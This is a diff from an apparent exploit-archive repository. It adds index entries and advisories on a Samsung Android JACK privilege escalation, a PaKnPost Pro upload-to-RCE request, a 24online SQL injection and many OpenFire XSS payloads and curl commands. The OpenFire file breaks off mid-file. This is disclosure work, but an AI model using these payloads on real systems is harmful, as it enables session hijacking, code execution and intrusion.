diff --git a/files.csv b/files.csv
index 98d044d50..3fb94f661 100755
--- a/files.csv
+++ b/files.csv
@@ -36058,6 +36058,7 @@ id,file,description,date,author,platform,type,port
 39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0
 39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0
 39864,platforms/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80
+40059,platforms/php/webapps/40059.txt,"CIMA DocuClass ECM - Multiple Vulnerabilities",2016-07-06,"Karn Ganeshen",php,webapps,80
 39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0
 39868,platforms/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80
 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux x86_64 XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
@@ -36229,3 +36230,11 @@ id,file,description,date,author,platform,type,port
 40056,platforms/lin_x86/shellcode/40056.c,"Linux x86 TCP Bind Shell Port 4444 - 98 bytes",2016-07-04,sajith,lin_x86,shellcode,0
 40057,platforms/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80
 40058,platforms/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80
+40060,platforms/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",jsp,webapps,80
+40061,platforms/lin_x86-64/shellcode/40061.c,"Linux 64bit Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) - 176 bytes",2016-07-06,CripSlick,lin_x86-64,shellcode,0
+40062,platforms/php/webapps/40062.txt,"Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities",2016-07-06,"Bikramaditya Guha",php,webapps,80
+40063,platforms/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic, Grega Preseren",cgi,webapps,80
+40064,platforms/linux/remote/40064.txt,"GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution",2016-07-06,"Dawid Golunski",linux,remote,0
+40065,platforms/jsp/webapps/40065.txt,"OpenFire 3.10.2 - 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80
+40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
+40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80
diff --git a/platforms/android/local/40066.txt b/platforms/android/local/40066.txt
new file mode 100755
index 000000000..09bfab40b
--- /dev/null
+++ b/platforms/android/local/40066.txt
@@ -0,0 +1,230 @@
+Sources:
+https://bugs.chromium.org/p/project-zero/issues/detail?id=796
+https://bugs.chromium.org/p/project-zero/issues/detail?id=795
+
+The usermode audio subsystem for the "Samsung Android Professional Audio" is
+based on JACK, which appears to be designed for single-user usage. The common
+JACK configuration on Linux systems appears to be a JACK server running under
+the current user account, and interacting with JACK clients from the same user
+account; so with a minimal privilege difference; this is not the case with the
+configuration on Android, where the JACK service runs as a more privileged user
+in a less restrictive SELinux domain to the clients that can connect to it.
+
+The shared memory implementation (implemented by com.samsung.android.IAndroidShm
+system service) allows any application to access/modify/map shared memory pages
+used by JACK, regardless of which application created those shared memory pages.
+
+(NB: This possibly results in breaking the Android permissions model and
+permitting applications without the required capability to access microphone
+input; this was not investigated further.)
+
+There are multiple possible ways to corrupt the internal state of any of the
+shared-memory backed c++ objects in use; attached is a PoC that uses the shared
+memory service to map the JackEngineControl object in use, and modify the value
+of the fDriverNum member, which is used in several places without validation.
+
+This is highly likely not the only variable stored in shared memory that is used
+without proper validation; and the function shown below is definitely not the
+only place that this particular variable is used dangerously. To secure this
+interface it will be necessary to review all uses of variables stored in these
+shared memory interfaces.
+
+/*!
+\brief Engine control in shared memory.
+*/
+
+PRE_PACKED_STRUCTURE
+struct SERVER_EXPORT JackEngineControl : public JackShmMem
+{
+ // Shared state
+ jack_nframes_t fBufferSize;
+ jack_nframes_t fSampleRate;
+ bool fSyncMode;
+ bool fTemporary;
+ jack_time_t fPeriodUsecs;
+ jack_time_t fTimeOutUsecs;
+ float fMaxDelayedUsecs;
+ float fXrunDelayedUsecs;
+ bool fTimeOut;
+ bool fRealTime;
+ bool fSavedRealTime; // RT state saved and restored during Freewheel mode
+ int fServerPriority;
+ int fClientPriority;
+ int fMaxClientPriority;
+ char fServerName[JACK_SERVER_NAME_SIZE+1];
+ JackTransportEngine fTransport;
+ jack_timer_type_t fClockSource;
+ int fDriverNum;
+ bool fVerbose;
+
+ // CPU Load
+ jack_time_t fPrevCycleTime;
+ jack_time_t fCurCycleTime;
+ jack_time_t fSpareUsecs;
+ jack_time_t fMaxUsecs;
+ jack_time_t fRollingClientUsecs[JACK_ENGINE_ROLLING_COUNT];
+ unsigned int fRollingClientUsecsCnt;
+ int fRollingClientUsecsIndex;
+ int fRollingInterval;
+ float fCPULoad;
+
+ // For OSX thread
+ UInt64 fPeriod;
+ UInt64 fComputation;
+ UInt64 fConstraint;
+
+ // Timer
+ JackFrameTimer fFrameTimer;
+
+#ifdef JACK_MONITOR
+ JackEngineProfiling fProfiler;
+#endif
+
+ ...
+
+This is quite a convenient exploitation primitive, as a small negative value
+will cause the code in several places to index backwards from a known array;
+when (any of the similar functions to the below are called, table is pointing
+to the fClientTable array inside a JackEngine instance)
+
+void JackTransportEngine::MakeAllLocating(JackClientInterface** table)
+{
+ for (int i = GetEngineControl()->fDriverNum; i < CLIENT_NUM; i++) {
+ JackClientInterface* client = table[i];
+ if (client) {
+ JackClientControl* control = client->GetClientControl();
+ control->fTransportState = JackTransportStopped;
+ control->fTransportSync = true;
+ control->fTransportTimebase = true;
+ jack_log("MakeAllLocating ref = %ld", i);
+ }
+ }
+}
+
+class SERVER_EXPORT JackEngine : public JackLockAble
+{
+ friend class JackLockedEngine;
+
+ private:
+
+ JackGraphManager* fGraphManager;
+ JackEngineControl* fEngineControl;
+ char fSelfConnectMode;
+ JackClientInterface* fClientTable[CLIENT_NUM];
+
+We can see that just behind the fClientTable, we have two pointers to other
+objects; a JackEngineControl and a JackGraphManager, both of which are backed by
+shared memory. Since we are treating the pointer read from table as a c++ object
+with a vtable pointer, this lets us trivially gain control of the flow of
+execution.
+
+ Fatal signal 11 (SIGSEGV), code 1, fault addr 0x41414140 in tid 27197 (jackd)
+ *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
+ Build fingerprint: 'samsung/zeroltexx/zerolte:6.0.1/MMB29K/G925FXXU3DPAD:user/release-keys'
+ Revision: '10'
+ ABI: 'arm'
+ pid: 27181, tid: 27197, name: jackd >>> /system/bin/jackd <<<
+ AM write failed: Broken pipe
+ signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414140
+ r0 f3f1a000 r1 f48c2010 r2 f48c2010 r3 41414141
+ r4 f3f1a000 r5 00000036 r6 f3dbf930 r7 00000078
+ r8 f72c8b9c r9 f6f1a308 sl f3d3f000 fp f719a991
+ ip f71d7a0c sp f3dbf7d8 lr f7196c43 pc 41414140 cpsr 800f0030
+
+ backtrace:
+ #00 pc 41414140
+ #01 pc 0003cc41 /system/lib/libjackserver.so (Jack::JackTransportEngine::MakeAllLocating(Jack::JackClientInterface**)+52)
+ #02 pc 0003cda1 /system/lib/libjackserver.so (Jack::JackTransportEngine::CycleEnd(Jack::JackClientInterface**, unsigned int, unsigned int)+228)
+ #03 pc 00048bd5 /system/lib/libjackserver.so
+ #04 pc 00049211 /system/lib/libjackserver.so (Jack::JackEngine::Process(unsigned long long, unsigned long long)+228)
+ #05 pc 000442fd /system/lib/libjackserver.so
+ #06 pc 00044f49 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSyncMaster()+40)
+ #07 pc 00044f0d /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSync()+20)
+ #08 pc 00044e87 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessSync()+94)
+ #09 pc 00044bbf /system/lib/libjackserver.so (Jack::JackAudioDriver::Process()+22)
+ #10 pc 0004fff1 /system/lib/libjackserver.so (Jack::JackThreadedDriver::Process()+24)
+ #11 pc 0005051f /system/lib/libjackserver.so (Jack::JackThreadedDriver::Execute()+18)
+ #12 pc 00040a0f /system/lib/libjackserver.so (Jack::JackAndroidThread::ThreadHandler(void*)+126)
+ #13 pc 0003fc53 /system/lib/libc.so (__pthread_start(void*)+30)
+ #14 pc 0001a38b /system/lib/libc.so (__start_thread+6)
+
+ Tombstone written to: /data/tombstones/tombstone_05
+
+################################################################################################################
+
+The usermode audio subsystem for the "Samsung Android Professional Audio" is
+based on JACK, which appears to be designed for single-user usage. The common
+JACK configuration on Linux systems appears to be a JACK server running under
+the current user account, and interacting with JACK clients from the same user
+account; so with a minimal privilege difference; this is not the case with the
+configuration on Android, where the JACK service runs as a more privileged user
+in a less restrictive SELinux domain to the clients that can connect to it.
+
+The JACK shared memory implementation uses the struct jack_shm_info_t defined in
+/common/shm.h to do some bookkeeping
+
+PRE_PACKED_STRUCTURE
+struct _jack_shm_info {
+ jack_shm_registry_index_t index; /* offset into the registry */
+ uint32_t size;
+#ifdef __ANDROID__
+ jack_shm_fd_t fd;
+#endif
+ union {
+ void *attached_at; /* address where attached */
+ char ptr_size[8];
+ } ptr; /* a "pointer" that has the same 8 bytes size when compling in 32 or 64 bits */
+} POST_PACKED_STRUCTURE;
+
+typedef struct _jack_shm_info jack_shm_info_t;
+
+This struct is stored at the start of every JackShmAble object.
+
+/*!
+\brief
+A class which objects possibly want to be allocated in shared memory derives from this class.
+*/
+
+class JackShmMemAble
+{
+ protected:
+
+ jack_shm_info_t fInfo;
+
+ public:
+
+ void Init();
+
+ int GetShmIndex()
+ {
+ return fInfo.index;
+ }
+
+ char* GetShmAddress()
+ {
+ return (char*)fInfo.ptr.attached_at;
+ }
+
+ void LockMemory()
+ {
+ LockMemoryImp(this, fInfo.size);
+ }
+
+ void UnlockMemory()
+ {
+ UnlockMemoryImp(this, fInfo.size);
+ }
+
+};
+
+This means that whenever the JACK server creates an object backed by shared
+memory, it also stores a pointer to that object (in the address space of the
+JACK server), allowing a malicious client to bypass ASLR in the JACK server
+process.
+
+The PoC provided for the other reported JACK issue uses this to bypass ASLR in
+the JACK server process.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40066.zip
diff --git a/platforms/cgi/webapps/40063.txt b/platforms/cgi/webapps/40063.txt
new file mode 100755
index 000000000..c0583e22c
--- /dev/null
+++ b/platforms/cgi/webapps/40063.txt
@@ -0,0 +1,91 @@
+# Exploit Title: PaKnPost Pro Arbitrary File Upload & Remote Code Execution
+# Date: 2016-07-06
+# Product: PaKnPost Pro
+# Vendor Homepage: http://www.paknpost.org
+# Software Link: https://sourceforge.net/projects/paknpost/
+# Version: <=1.14
+# Tested on: Windows, Linux
+# Exploit Authors: Edvin Rustemagic, Grega Preseren
+# Contacts: https://www.linkedin.com/in/edvinrustemagic - https://si.linkedin.com/in/gregapreseren
+
+===========
+Description
+===========
+File extension check bypass and directory traversal lead to uploading an arbitrary file to an unintended directory and remote code execution.
+
+=======
+Details
+=======
+File extension check can be bypassed by using two extensions, out of which one must be allowed (select_.cgi:368).
+Directory traversal vulnerability exists in the GET parameter sid, where no validation checks are made (select_.cgi:204).
+Exploitation of these two vulnerabilities allows an attacker to upload a webshell to an executable directory and gain command line access to the server. Windows deployments turned out to be more likely exploitable with a consequence of gaining SYSTEM privileges.
+
+========
+Timeline
+========
+2016-03-15 Vulnerability discovered at customer's deployment.
+2016-06-13 PoC completed for Linux and Windows platforms.
+2016-06-13 Author/Maintainer at SourceForge has been notified.
+2016-06-21 Patch written and delivered to Author/Maintainer.
+2016-06-23 Patch publicly released.
+2016-07-06 Exploit submitted to Exploit-DB.
+
+=======================
+Windows PoC Environment
+=======================
+- Windows Server 2003 R2 SP2
+- Apache 2.2.10
+- ActivePerl 5.8.0.806
+
+=====================
+Linux PoC Environment
+=====================
+- Debian 8.3
+- Apache 2.4.10
+- Perl 5.20.2
+
+=======
+Exploit
+=======
+1. File upload GET parameter 'sid' can be exploited in order to upload an arbitrary file to an unintended executable directory.
+2. File upload multipart POST parameter 'filename' can include two extensions to bypass file extension check.
+For example:
+POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/1.1
+Host: paknpost
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://paknpost/cgi-bin/pnp/select.cgi
+Connection: close
+Content-Type: multipart/form-data; boundary=---------------------------6077763223847
+Content-Length: 6087
+
+-----------------------------6077763223847
+Content-Disposition: form-data; name="file[1]"; filename="pnp-test.txt.cgi"
+Content-Type: application/octet-stream
+
+==============
+Solution/Patch
+==============
+a. Update to version 1.15
+b. Or apply the following patch:
+--- select_.cgi.ORIG 2016-03-29 22:56:40.868000000 +0200
++++ select_.cgi 2016-06-14 10:18:37.864000000 +0200
+@@ -201,6 +201,9 @@
+ }
+ 
+ # Create the new Holding Area
++if ($sessionid =~ m/[^\w]/) {
++ &error(file_write);
++}
+ $user_dir = $upload_dir.$sessionid;
+ if (-d "$user_dir")
+ {
+@@ -365,7 +368,7 @@
+ if ($file_check)
+ {
+ # Exclude all except acceptable file extensions as a fist cut to file checks
+- unless (grep($fhl =~ /$_/, @allowed_ext)) { $debug1 = "Failed"; &show_file_not_allowed; }
++ unless (grep($fhl =~ /$_$/, @allowed_ext)) { $debug1 = "Failed"; &show_file_not_allowed; }
+ $debug1 = "Passed";
\ No newline at end of file
diff --git a/platforms/jsp/webapps/40060.txt b/platforms/jsp/webapps/40060.txt
new file mode 100755
index 000000000..01a022eba
--- /dev/null
+++ b/platforms/jsp/webapps/40060.txt
@@ -0,0 +1,22 @@
+# Exploit Title: SQL Injection In 24 Online Billing API
+# Date: 03/07/2016
+# Exploit Author: Rahul Raz
+# Vendor Homepage: http://24onlinebilling.com
+# Software Name:24online Model SMS_2500i
+# Version: 8.3.6 build 9.0
+# Tested on: Ubuntu Linux
+
+Potentially others versions older than this are vulnerable too.
+
+Vulnerability type: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
+
+The invoiceid GET parameter on /24online/webpages/myaccount/usersessionsummary.jsp in not filtered properly and leads to SQL Injection
+
+Authentication Required: Yes
+
+A non-privileged authenticated user can inject SQL commands on the /24online/webpages/myaccount/usersessionsummary.jsp?invoiceid= &fromdt=dd/mm/yyyy hh:mm:ss&todt= dd/mm/yyyy hh:mm:ss
+
+There is complete informational disclosure over the stored database.
+
+
+I tried to contact them to disclose and get the vulnerability patched, but they did not reply positively.
diff --git a/platforms/jsp/webapps/40065.txt b/platforms/jsp/webapps/40065.txt
new file mode 100755
index 000000000..29d08a7cf
--- /dev/null
+++ b/platforms/jsp/webapps/40065.txt
@@ -0,0 +1,681 @@ +# Several vulnerabilities doscovered in OpenFire version 3.10.2 to 4.0.1 + + +## Product Description + +**OpenFire** is an opensource project under GNU GPL licence. It provides a Jabber/XMPP server fully develloped in Java. It's develloped by the **Ignite realtime** community. +The actual version of the product is 4.0.2. + +Official web site : http://igniterealtime.org/ + +Several vulnerabilities have been discovered between 2015, October and 2016, February. +Reported vulnerabilities are similar to those previously discovered by hyp3rlinx, although they concern different pages. + +In brief, the flaws are of the following kinds: CSRF, XSS (reflected and stored), file upload and information disclosure. Most vulnerabilities need an administration access to the web application and may lead to personal information leakage or account take-over. + +**Ingnite realtime** fixed some vulnerabilities (the corresponding commit ID are indicated in this document). + + +## Several Relected XSS Vulnerabilities identified in Openfire 3.10.2 + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-79 + +**CVSS Base Score**: 5.2 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS may lead to session hijacking on admin user. 
+ +### Proof of Concept + +#### *domain* and *remotePort* variables from *server2server-settings.jsp* + +The following POST values can be sent to trigger the vulnerability: + +``` +domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server +``` + +or + +``` +domain=testt&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server +``` + +or + +``` + +domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server +``` + +You can reproduce the exploitation with the following curl commands: + +``` +curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX" + +curl --data "domain=test&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX" + +curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX" +``` + +#### *criteria* variable from *plugins/search/advance-user-search.jsp* + +The following GET request exploits the XSS vulnerability: + +``` +http://OpenFireServerIP:9090/[[http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search +``` + + +## Several stored XSS Vulnerabilities identified in Openfire 3.10.2 + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-79 + +**CVSS Base Score**: 5.5 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +Several XSS vulnerabilities have been found on several pages of the administration panel. 
Stored XSS could lead to session hijacking on admin user. + +### Proof of Concept + +#### *mucdesc* variable from *muc-service-edit-form.jsp* + +The following POST values can be sent to trigger the vulnerability: + +``` +save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E +``` + +The following code allows the creation of a web frame exploiting the vulnerability: + +``` + +
+ + + +
+ + +``` + +or with this curl command: + +``` +curl --data "save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX" +``` + +#### *searchname* variable from *plugins/search/search-props-edit-form.jsp* + +The following POST values can be sent to trigger the vulnerability: + +``` +searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false +``` + +The following code allows the creation of a web frame exploiting the vulnerability: + +``` + +
+ + + +
+ + +``` + +or with this curl command: + +``` +curl "http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp" --data="searchEnabled=true&searchname=%22/%3E%3Cscript%3Ealert('XSS')%3C/script%3E&groupOnly=false" --cookie="JSESSIONID=XXX" +``` + + +#### *searchname* variable from *page plugins/search/search-props-edit-form.jsp* + +The following POST values can be sent to trigger the vulnerability: + +``` +propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property +``` + +The following code allows the creation of a web frame exploiting the vulnerability: + +``` + +
+ + + + +
+ + +``` + +or with this curl command: + +``` +curl --data "searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false" https://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp --cookie="JSESSIONID=XXX" +``` + +#### *serverName* variable from *plugins/search/search-props-edit-form.jsp* + +The following POST values can be sent to trigger the vulnerability: + +``` +serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties +``` + +The following code allows the creation of a web frame exploiting the vulnerability: + +``` + +
+ + + + + + + + + + + + +
+ + +``` + +or with this curl command: + +``` +curl --data "serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties" https://OpenFireServerIP:9090/server-props.jsp --cookie="JSESSIONID=XXX" +``` + +### Affected versions + +* Version >= 3.10.2 and < 4.0.0 + + +## Several Relected XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1 + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-79 + +**CVSS Base Score**: 5.2 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS could lead to session hijacking against an administrator. + +Some of these vulnerabilities have already been found by hyp3rlinx, but had not been patched properly. 
+ +### Proof of Concept + +#### *groupchatName*, *groupchatJID*, *users* and *groups* variables from *page create-bookmark.jsp* suffer from the vulnerability + +The following POST values can be sent to trigger the vulnerability: + +``` +groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS1%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS2%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat +``` + +The following curl command allows reproducing the attack against the Openfire *plugins/bookmarks/create-bookmark.jsp* page: + +``` +curl --data "save=true&mucname=conference&mucdesc=Public+Chatrooms%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX" +``` + +#### *search* variable from *group-summary.jsp* + +The following GET request exploit the XSS vulnerability: + +``` +http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22 +``` + +The following curl command allows reproducing the attack against the Openfire *group-summary.jsp* page. 
+ +``` +curl http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22 --cookie="JSESSIONID=XXX" +``` + + +#### *maxTotalSize*, *maxFileSize*, *maxDays*, *logTimeout* variables from *audit-policy.jsp* + +The following GET request exploit the XSS vulnerability: + +``` +http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings +``` + +The following curl command allows reproducing the attack against the Openfire *audit-policy.jsp* page: + +``` +curl "http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings" --cookie="JSESSIONID=XXX" +``` + +#### *passPhrase* variables from *import-keystore-certificate.jsp* + +The following POST values exploit the XSS vulnerability: + +``` +passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save +``` + +The following curl command allows reproducing the attack against the Openfire *import-keystore-certificate.jsp* page. 
+ +``` +curl http://OpenFireServerIP:9090/import-keystore-certificate.jsp --data="passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save" --cookie="JSESSIONID=XXX" +``` + +#### *criteria* variable from */plugins/search/advance-user-search.jsp* + +The following GET request exploit the XSS vulnerability: + +``` +http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search +``` + +The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* admin page. + +``` +curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX" +``` + +### Affected versions + +* Version 4.0.0 and 4.0.1 + +## Several stored XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1 + +Some of these vulnerabilities have already been found by hyp3rlinx, but has not been patched since. + +**Access Vector**: remote + +**Security Risk**: low + +**Vulnerability**: CWE-79 + +**CVSS Base Score**: 5.5 + +[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O + +### Vulnerability Description + +Several XSS vulnerabilities have been found on several pages of the administration panel. Stored XSS could lead to session hijacking on admin user. 
+ +### Proof of Concept + +#### *subdomain* variable from *connection-settings-external-components.jsp* + +The following curl command allows reproducing the attack against the Openfire *connection-settings-external-components.jsp* page: + +``` +curl --data "subdomain=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&secret=toto&componentAllowed=Add+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX" +``` + +Or + +``` +curl --data "subdomain=%22%3Escript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&componentBlocked=Block+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX" +``` + +#### *mucdesc* variable from *muc-service-edit-form.jsp* + +The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page: + +``` +curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX" +``` + +#### *groupchatName*, *groupchatJID*, *users* and *groups* variables from page muc-service-edit-form.jsp + +The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page: + +``` +curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX" +``` + +#### *searchname* variable from 
*plugins/search/search-props-edit-form.jsp* + +The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* page: + +``` +curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX" +``` + +The folling code allows exploiting the vulnerability: + +``` + +
+ + + +
